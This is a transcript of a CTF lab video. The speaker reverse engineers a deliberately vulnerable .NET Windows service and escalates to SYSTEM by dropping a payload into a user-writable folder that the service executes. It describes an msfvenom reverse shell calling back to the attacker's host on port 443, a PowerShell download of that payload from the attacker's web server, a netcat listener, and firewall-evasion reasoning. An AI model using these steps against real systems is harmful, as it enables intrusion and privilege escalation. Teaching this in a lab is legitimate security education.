Hey, so back with another video about doing remote exploitation of the client dev CTF machine. This time what we're going to do is we're going to start with the process of reverse engineering the vulnerable service executable that's there, seeing what it's doing and seeing if we can take advantage of some of the vulnerabilities that are present in the application. So we already know how to get our foothold as the low privileged user, so we're going to go ahead and do that. Get our connection as a low privileged user, and now what we're going to do is we are going to grab a copy of the vulnerable service executable so that we can reverse engineer it, see what it does. Take a look at the code, see if we can take a look at the code and get an idea around what it's doing. So we're going to go to cd program files, x86, vulnerable service exercise. So here we are. So we have this vulnerable service in here running. So what we're going to do is we are going to set up an SMB server. So SMB is just like file sharing. So we're going to set up our own SMB server so we can transfer that file over to us, try to take a look at it, reverse engineer it, see what it's doing, see if we can find any exploits that we can run. So we're going to use a tool suite called Impacket. And you guys can either Google that or reach out to me if you want to learn more about what Impacket is. So we're going to use Impacket and we're going to set up an SMB server. And we're going to set up the share name of shared, and that shared is going to go to home, Jerry, and then client CTF. So here's our SMB server setup. So let's look one more time. So what we want to do is copy item, and we're going to copy vulnerable service.exe, and we are going to copy that over to our other host. Actually, let's go back out so you guys can see that a little bit better without my head being in the way. So we're going to go to 192.168.0.52, and we are going to go to shared, and we are going to write it down as vulnerable service.exe. Now we see that we got an authentication over here, so let's take a look. And vulnerable service.exe is here. So let's take a look at what kind of file it is. And it is a mono.net assembly, PE32 executable. Okay, great. So this is a Windows executable. So we got the file. Now what we need to do is actually set up a way to transfer it back over to our reverse engineering machine. So there are ways to reverse engineer .NET code on Linux, but it's much cleaner to just do it on Windows. So what I have is I have a Windows box set up for us to do our reverse engineering with a reverse engineering tool. This should look pretty familiar because this is the same one that I gave you guys as part of the CTF exercise. So what we're going to do is we are going to go set up a server here so that we can download that. So sudo python3 tac-m http.server on port 80. Put in our password, and now we're serving this up on port 80. So then on our reverse engineering machine, we can go over here and we can go to 192.168.0.52, and we can see that it's here. So we'll grab vulnerable service.exe, we'll save it down, we'll open that folder. Here it is. Great. So now we've got this executable. Let's try to start taking a look at what this executable is doing. So let's bring it out onto our desktop. We'll open up our reverse engineering tool, code reflect. Let's see, it says it needs .NET 5. I think we can skip it. Oh, we can't skip it. Let's see how long it takes to install. So it should be downloading the files for .NET 3.5, so we can install them. While we're doing this, let's go back here, make sure our SMB server got cleaned up. It did get cleaned up. Good, so we can get rid of that. We've got those files there. We still have our connection to our victim machine. Still downloading and installing. When we take a look at vulnerable service here, we want to unblock it just in case we need to run it for some reason. So it's downloaded. You can see the details on it. It's version 1.0. installing .NET 3.5. So the goal is for us to be able to reverse this executable back to human readable code so that when we look at the code, we can look for any vulnerable functions that it has. So if it's making calls out to any executables or DLLs, or if it's making calls out to other locations that we can control, then hopefully we can hijack those calls out to those locations. It's still installing, so I'm going to pause the video for a minute until it's done installing. Okay, we're back. So .NET 3.5 finished installing, so let's open up CodeReflect and let's take a look at, whoops, I was going to the wrong ones. We want to go to the desktop here, which is C, users, K McDaniel, desktop, there it is. So we open up vulnerable service and we can see it is a .NET DLL, or .NET service, .NET executable, which is good. So we can look at all of it. So we've got some things here. We've got encryption, which we'll look into that just a little bit. We've got flag generator, flag writer, service base, program, and task runner. Okay, so let's try to break this down. Let's take a look at it. So encryption, that seems like a good place to start. So let's take a look at encrypt. And, okay, so let's take a look at encrypt. So it looks like we have a public string called encryption key, and then we have a public string called initialization vector. So it looks like we have what is a hard-coded key and a hard-coded, there they are. So we have a hard-coded encryption key and a hard-coded initialization vector. So if we find anything that's encrypted, so there's our encryption key in our constructor, and there's our initialization vector. So I'm not going to dig too deep into it, but encryption is a process through which you take human readable text or data and protect it to make it non-human readable that should not be reversible without the key. But the problem that we have here is the encryption key and initialization vector for this encryption algorithm, for decrypt and encrypt here, are hard-coded in the code. And so we can reverse engineer this code, and here's the encryption key right here. Plain text for us to view, and here's the initialization vector. So we know we can take a .NET encryption algorithm and just plug these values in and decrypt whatever data. So if we find any encrypted data, we can do that. So flag generator and flag writer, you guys can look into those more if you want. Those are convenience methods for things that I built for the CTF. They're doing some interesting things. I mean, you can take a look at them if you want to, but they're just doing some interesting things for convenience for me to be able to do the CTF. And we accidentally opened MS Core lib. So flag generator, flag writer, just two interesting things I did. So then let's take a look at the program. So what is the program doing? It is starting up a service, and that's it. And then we have our service one here. So service one is our service class, and execution timer elapsed. So it looks like we have a timer running. So we have on start here. Yep, we're grabbing a timer, and then we have a hook into execution timer elapsed. And on stop, we're just shutting everything down. Components, here's our execution timer. And then we have something called task runner, which looks like it's a class inside of here. And here it is. So here's task runner. So it looks like on start, we are starting that up, and when our execution timer is elapsed, here we go. So when our execution timer elapses, we are calling into task runner, and we're calling run backup. Then we're calling run helper functions, then we're calling run registry command. So for the sake of simplicity, we're going to break this down into 3 separate videos. Video number 1, we are going to dissect the run backup function, take a look at what it is doing, hijack that, and see if we can get code execution that will allow us to elevate our privileges again. So we're standard user, we're low privs, we want to get all the way up to the NT system account, and hopefully we can hijack whatever the execution of this run backup is doing. So let's take a look at run backup. So it sets a string, a hard-coded string of C DevTools backup, and then it's looking for this solved.txt, So it's trying to see if the backup is solved. And then, hold on, let's go. So we come in here and we say, okay, does this file exist? So does C DevTools backup exist? And does this exist? C DevTools backup solve.txt. And if those don't exist, then it is calling flag generator with the text backup solved. And then it is generating the flag. And then it's writing the flag. And then it's calling process.start on DevTools backup. Okay, so what's happening here in this code is it's going to say, okay, does C DevTools backup exist? If it does C DevTools backup solve.txt exist? If neither of these two files exist, so if this exists, but this doesn't exist, then it's going to generate a flag for us, write it out, and then start our process. Now, this code's a little bit different than what you'd expect to see in a real service. I'll explain a little bit my thinking here. So what I wanted to do was, I'm gonna show you how to hijack this call right here, the C DevTools backup.exe. Now, it's gonna spit out a flag called backup solve.txt. And what I wanted to do was prevent this logic from triggering over and over and over. So what it does is when you solve this challenge, it spits out a backup solve.txt with the flag in it for you by generating a flag off backup solved, spitting it into this file so that it won't keep triggering the same vulnerability over and over and over. So C DevTools backup.exe, it's making a call into here with NT authority system privileges because it's NT authority system, right? So we need to check the writes on the C DevTools folder and see if we can drop an executable in there. And if we can possibly get code execution. So we want to cd c:\devtools, and let's look in here. So there's nothing in here. So again, we're going to try to test for being able to write. And we can. So we can write to test.txt. So let's get rid of that. So now what we need to do is we need to get that in there, right? We need to put something in there that's backup.exe. Let's go check. Let's go check one more time. Okay, yeah. So we need to write C DevTools backup.exe. So let's create a payload called backup.exe using the same syntax we had before, MSF Venom -P. We want to do Windows, and we want this to be a shell, and we want it to be stageless. So we want to do shell reverse because we want the host to connect back to us. I'm not going to talk too much about reverse shells and bind shells, but I'll talk a little bit about it right now. So a reverse shell is saying, okay, victim machine, the one that we're hacking, right? You victim machine, we're making an outbound connection back to me. Now, from here on out, I'm going to be a little bit better about my OPSEC and use real ports, right? We'll use real ports instead of silly ports like leaked. So when I make an outbound connection on a port, that is more likely to be allowed out through the firewall, right? So if I make an outbound connection on port 443, most firewalls allow 443 outbound because that's browsing HTTPS. So 443 outbound is a great thing for it to do. Now, if I tried to do a bind shell is what it's called, and that's opening up a port on the victim machine. If I try to open up a port on the victim machine, it's unlikely that I'm going to be able to open up any random port because firewalls exist and they lock down ports, right? So we always want to do a reverse shell, having it connect back to us, and we're going to listen on the port that we specify. So we're going to say a shell reverse, and it's going to be TCP. We don't want to do UDP. We're going to be TCP, and our L host is 192.168.0.52. So this is your IP address here. Our L port is equal to 443. So we're going to be a little bit better about our OPSEC because 1337, if you saw traffic leaving a box going outbound to port 1337, that's instantly suspicious. If we're going out to port 443, it's a little bit less suspicious, right? It's still sort of suspicious because you look at the traffic and you're going to see what it is, but it's a little bit less suspicious. And then the format here is just going to be exe because it doesn't look like this is a service because it's just making ad hoc calls. Hey, does this file exist? Call it. File exists? Call. File exists? Call. Okay, so if that file does exist, it's going to trigger this method, give us the flag, and hopefully give us code execution. So it just needs to be an exe. And we need to call this backup.exe, right? So we're going to let this payload generate. We've already got our web server listening here. And so then what we need to do is we need to do IEX, which is invoke expression. We need to do new object, and then we do net.web client, and then we're going to call .download file from our web server, from our malicious attacking web server, HTTP 192.168.052. And then we're going to get backup.exe. And we are going to save that down to c:\dev tools backup.exe, right? Now, before we do that, we want to set up our listeners. We want to do sudo nc sudo rl wrap nc tag lvnp, and we did 443, right? So now we've got this listening. We've got our web server ready. So we're going to transfer the file over. And immediately you'll see we got code execution. And who are we? We are NT authority system. So let's take a look in here. And we can now see backup solved has been generated. So if we do get content of backup solved.txt, there's our hash, there's our flag for this challenge. So we wanted to get our flag for the challenge, right? So let's do v sudo v backup flag, right? So we got the flag for the backup challenge, right? For reverse engineering it and finding out where this was. Okay, so there's our backup challenge flag. And then we also see the backup.exe call back to us, and now we are NT authority system. Now, one thing I keep forgetting to do is I keep forgetting to get root.txt. So I got user.txt, right? So cat user.txt, and it's there, cat backup, the backup flag is there, but I haven't gotten root.txt. So we've achieved privilege escalation on this machine 3 ways now, but I keep forgetting to get root.txt, and I just realized that. So let's go get root.txt. So we want to do cd users, and then we want to take a look at what's in here, and we say, okay, we got low privs, that's who we were before, standard. So standard is the administrator account, so we cd standard, and then we go, okay, we want to go into documents, and then let's take a look at what's in here, and there's root.txt. So let's type root.txt. Now you'll notice this is a command line, this is PowerShell, so different commands, right? This is simple command line commands, PowerShell commands. But we did type root.txt, here's root.txt, here's the flag that's inside of there. So if we sudo v root.txt, so at this point we have now collected 3 flags. We got user.txt, we got root.txt, and now we got our flag for solving the backup challenge. Now I'm gonna do some cleanup before the next video, get rid of backup.exe, but we're gonna leave the backup solve.txt there so we can keep track of all the different flags that we've solved, right? So we've got code execution. We got code execution, which resulted in privilege escalation. Now why? Because what happened was this service is making calls down into a folder that's controlled by the user. And if the user can do something in that folder, then we can hijack execution, right? So if there is an executable sitting in that folder that the service is making calls into that a standard user can edit or change or create, then we can get code execution. Again, these are vulnerabilities that I have seen in ourselves and in our partners. These are real vulnerabilities, things that we are fixing and should fix. But this shows us the potential exploitation vectors, right? The things that you can do with that information. So we just got these 3 flags now. Finally got root.txt. I kept forgetting to grab it. And the next one, we'll take a look at the next function that service is running. I'll see you guys next time.